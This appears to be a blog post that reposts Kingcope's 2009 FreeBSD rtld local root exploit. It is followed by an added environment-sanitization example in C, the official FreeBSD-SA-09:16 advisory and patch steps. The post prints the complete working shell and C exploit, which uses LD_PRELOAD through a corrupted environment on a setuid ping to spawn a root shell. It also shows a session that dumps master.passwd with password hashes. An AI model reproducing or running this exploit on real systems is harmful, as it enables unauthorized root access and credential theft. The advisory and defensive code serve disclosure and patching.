Local r00t zero-day exploit on FreeBSD
This time I will write about an exploit found recently in the FreeBSD operating system. It is a local exploit: when run, it lets an ordinary user obtain root access on the system.
Below is the report of this local r00t exploit from a mailing-list archive: http://seclists.org/fulldisclosure/2009/Nov/371
** FreeBSD local r00t 0day
Discovered & Exploited by Nikolaos Rangos also known as Kingcope.
Nov 2009 “BiG TiME”
“Go fetch your FreeBSD r00tkitz” // http://www.youtube.com/watch?v=dDnhthI27Fg
There is an unbelievable simple local r00t bug in recent FreeBSD versions.
I audited FreeBSD for local r00t bugs a long time *sigh*. Now it pays out.
The bug resides in the Run-Time Link-Editor (rtld).
Normally rtld does not allow dangerous environment variables like LD_PRELOAD
to be set when executing setugid binaries like “ping” or “su”.
With a rather simple technique rtld can be tricked into
accepting LD variables even on setugid binaries.
See the attached exploit for details.
Example exploiting session
**********************************

```
%uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009
root@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
uid=1001(kcope) gid=1001(users) groups=1001(users)
%./w00t.sh
FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in function 'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
# uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009
root@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
uid=1001(kcope) gid=1001(users) euid=0(root) groups=1001(users)
# cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $
#
root:$1$AUbbHoOs$CCCsw7hsMB14KBkeS1xlz2:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
kcope:$1$u2wMkYLY$CCCuKax6dvYJrl2ZCYXA2:1001:1001::0:0:User &:/home/kcope:/bin/sh
#
```

Systems tested/affected
**********************************

FreeBSD 8.0-RELEASE *** VULNERABLE
FreeBSD 7.1-RELEASE *** VULNERABLE
FreeBSD 6.3-RELEASE *** NOT VULN
FreeBSD 4.9-RELEASE *** NOT VULN
*EXPLOIT*
```sh
#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat > env.c << _EOF
#include <stdio.h>
main() {
extern char **environ;
environ = (char**)malloc(8096);
environ[0] = (char*)malloc(1024);
environ[1] = (char*)malloc(1024);
strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");
execl("/sbin/ping", "ping", 0);
}
_EOF
gcc env.c -o env
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
extern char **environ;
environ=NULL;
system("echo ALEX-ALEX;/bin/sh");
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env
```
The FreeBSD versions vulnerable to this exploit include FreeBSD 7 and FreeBSD 8; earlier versions of the operating system are not vulnerable. The exploit takes advantage of a security flaw in rtld (the Run-Time Link-Editor) on FreeBSD systems.
Instructions for patching this local r00t exploit, and the download location, can be found at http://security.freebsd.org/advisories/FreeBSD-SA-09:16.rtld.asc.
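Kingcope's env.c above hands /sbin/ping an environment whose first entry is a zeroed buffer with no NAME=VALUE pair, and the advisory below attributes the bypass to attempts to unset variables failing on a corrupt environment. The C program that follows is added here as an illustration; it is not code from the post, from Kingcope or from FreeBSD. It shows the defensive shape of that cleanup: validate and compact the environment array directly, so that one corrupt entry cannot stop the sweep before a later LD_PRELOAD is reached. The unsafe-prefix list, the function names and the constructed sample environment are assumptions of the example, not rtld's own tables.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Variable-name prefixes a set-user-ID program must never honour from its
 * caller. "LD_" covers LD_PRELOAD and LD_LIBRARY_PATH. The list is an
 * assumption of this example, not rtld's real table.
 */
static const char *const unsafe_prefixes[] = { "LD_", NULL };

/*
 * A well-formed entry is NAME=VALUE with a non-empty NAME. The exploit above
 * plants an entry with no '=' at all (environ[0] is a zeroed buffer); that is
 * the shape ld-elf.so.1 reported as "environment corrupt; missing value for".
 */
int env_entry_is_wellformed(const char *entry)
{
    const char *eq;

    if (entry == NULL)
        return 0;
    eq = strchr(entry, '=');
    return eq != NULL && eq != entry;
}

/* True when the entry's NAME starts with one of the unsafe prefixes. */
int env_entry_is_unsafe(const char *entry)
{
    size_t i;

    for (i = 0; unsafe_prefixes[i] != NULL; i++) {
        size_t n = strlen(unsafe_prefixes[i]);
        if (strncmp(entry, unsafe_prefixes[i], n) == 0)
            return 1;
    }
    return 0;
}

/*
 * Compact envp in place, dropping every entry that is malformed or unsafe.
 * Returns the number of entries removed. The sweep walks the array itself
 * instead of calling unsetenv(3) once per name, so a corrupt entry cannot
 * abort the cleanup early and leave a later LD_PRELOAD in place.
 */
size_t sanitize_env(char **envp)
{
    size_t in, out = 0, removed = 0;

    for (in = 0; envp[in] != NULL; in++) {
        if (!env_entry_is_wellformed(envp[in]) ||
            env_entry_is_unsafe(envp[in])) {
            removed++;
            continue;
        }
        envp[out++] = envp[in];
    }
    envp[out] = NULL;
    return removed;
}

/*
 * Constructed sample mirroring the environment env.c builds: a corrupt first
 * entry, then LD_PRELOAD, then two ordinary variables. Returns how many
 * entries survive sanitization (the two ordinary ones).
 */
size_t demo_surviving_entries(void)
{
    static char corrupt[1024];              /* zeroed: an empty, '='-less entry */
    static char preload[] = "LD_PRELOAD=/tmp/w00t.so.1.0";
    static char path[] = "PATH=/bin:/usr/bin";
    static char home[] = "HOME=/home/kcope";
    char *sample[] = { corrupt, preload, path, home, NULL };
    size_t n;

    sanitize_env(sample);
    for (n = 0; sample[n] != NULL; n++)
        ;
    return n;
}

int main(void)
{
    printf("entries surviving sanitization: %zu\n", demo_surviving_entries());
    return 0;
}
```

The point of the design is that validity and safety are decided per entry while walking the array, and the decision to drop an entry never depends on a library call succeeding for every other entry. A loader that instead unsets a fixed list of names, and stops at the first error, has exactly the failure mode the advisory describes.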
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=============================================================================
FreeBSD-SA-09:16.rtld Security Advisory
The FreeBSD Project
Topic: Improper environment sanitization in rtld(1)
Category: core
Module: rtld
Announced: 2009-12-03
Affects: FreeBSD 7.0 and later.
Corrected: 2009-12-01 02:59:22 UTC (RELENG_8, 8.0-STABLE)
2009-12-03 09:18:40 UTC (RELENG_8_0, 8.0-RELEASE-p1)
2009-12-01 03:00:16 UTC (RELENG_7, 7.2-STABLE)
2009-12-03 09:18:40 UTC (RELENG_7_2, 7.2-RELEASE-p5)
2009-12-03 09:18:40 UTC (RELENG_7_1, 7.1-RELEASE-p9)
CVE Name: CVE-2009-4146, CVE-2009-4147
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit
I. Background
The run-time link-editor, rtld, links dynamic executables with their
needed libraries at run-time. It also allows users to explicitly
load libraries via various LD_ environment variables.
II. Problem Description
When running setuid programs rtld will normally remove potentially
dangerous environment variables. Due to recent changes in FreeBSD
environment variable handling code, a corrupt environment may
result in attempts to unset environment variables failing.
III. Impact
An unprivileged user who can execute programs on a system can gain
the privileges of any setuid program which he can run. On most
system configurations, this will allow a local attacker to execute
code as the root user.
IV. Workaround
No workaround is available, but systems without untrusted local users,
where all the untrusted local users are jailed superusers, and/or where
untrusted users cannot execute arbitrary code (e.g., due to use of read
only and noexec mount options) are not affected.
Note that “untrusted local users” include users with the ability to
upload and execute web scripts (CGI, PHP, Python, Perl etc.), as they
may be able to exploit this issue.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to 7-STABLE or 8-STABLE,
or to the RELENG_8_0, RELENG_7_2, or RELENG_7_1 security branch dated
after the correction date.
2) To patch your present system:
The following patches have been verified to apply to FreeBSD 7.1, 7.2,
and 8.0 systems.
a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.
[FreeBSD 7.x]
```
# fetch http://security.FreeBSD.org/patches/SA-09:16/rtld7.patch
# fetch http://security.FreeBSD.org/patches/SA-09:16/rtld7.patch.asc
```
[FreeBSD 8.0]
```
# fetch http://security.FreeBSD.org/patches/SA-09:16/rtld.patch
# fetch http://security.FreeBSD.org/patches/SA-09:16/rtld.patch.asc
```
b) Execute the following commands as root:
```
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/libexec/rtld-elf
# make obj && make depend && make && make install
```
NOTE: On the amd64 platform, the above procedure will not update the
ld-elf32.so.1 (i386 compatibility) run-time link-editor (rtld). On
amd64 systems where the i386 rtld are installed, the operating system
should instead be recompiled as described in
VI. Correction details
The following list contains the revision numbers of each file that was
corrected in FreeBSD.
```
CVS:

Branch                                                           Revision
  Path
- -------------------------------------------------------------------------
RELENG_7
  src/libexec/rtld-elf/rtld.c                                     1.124.2.7
RELENG_7_2
  src/UPDATING                                               1.507.2.23.2.8
  src/sys/conf/newvers.sh                                     1.72.2.11.2.9
  src/libexec/rtld-elf/rtld.c                                 1.124.2.4.2.2
RELENG_7_1
  src/UPDATING                                              1.507.2.13.2.12
  src/sys/conf/newvers.sh                                     1.72.2.9.2.13
  src/libexec/rtld-elf/rtld.c                                 1.124.2.3.2.2
RELENG_8
  src/libexec/rtld-elf/rtld.c                                     1.139.2.4
RELENG_8_0
  src/UPDATING                                                1.632.2.7.2.4
  src/sys/conf/newvers.sh                                      1.83.2.6.2.4
  src/libexec/rtld-elf/rtld.c                                 1.139.2.2.2.2
- -------------------------------------------------------------------------

Subversion:

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/7/                                                         r199981
releng/7.2/                                                       r200054
releng/7.1/                                                       r200054
stable/8/                                                         r199980
releng/8.0/                                                       r200054
- -------------------------------------------------------------------------
```
VII. References
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4146
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4147
The latest revision of this advisory is available at
http://security.FreeBSD.org/advisories/FreeBSD-SA-09:16.rtld.asc
```
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (FreeBSD)

iEUEARECAAYFAksXg/IACgkQFdaIBMps37KrLwCdH4JsCrvdS1RGoGj7MlNgV3+/
nhYAliVcz9tL8Ll6pYKpIalR740sZ5s=
=jK/a
-----END PGP SIGNATURE-----
```
Although, after testing, the machine I patched (FreeBSD 7.2-RELEASE) could still be hit by this exploit. Perhaps there are still steps in this patching procedure that I have not carried out, so it is still not free from this local exploit.
Update: (7 December 2009)
To apply the patch, it is enough to use freebsd-update by running the following command as root:
Many thanks to mas Arif for the additional way of patching this exploit.
That is all for this post. I hope it is useful.
Source : http://crescenthikari.wordpress.com/2009/12/04/local-r00t-exploit-zeroday-pada-freebsd/
This entry was posted on Tuesday, February 23rd, 2010 at 5:23 pm and is filed under FreeBSD.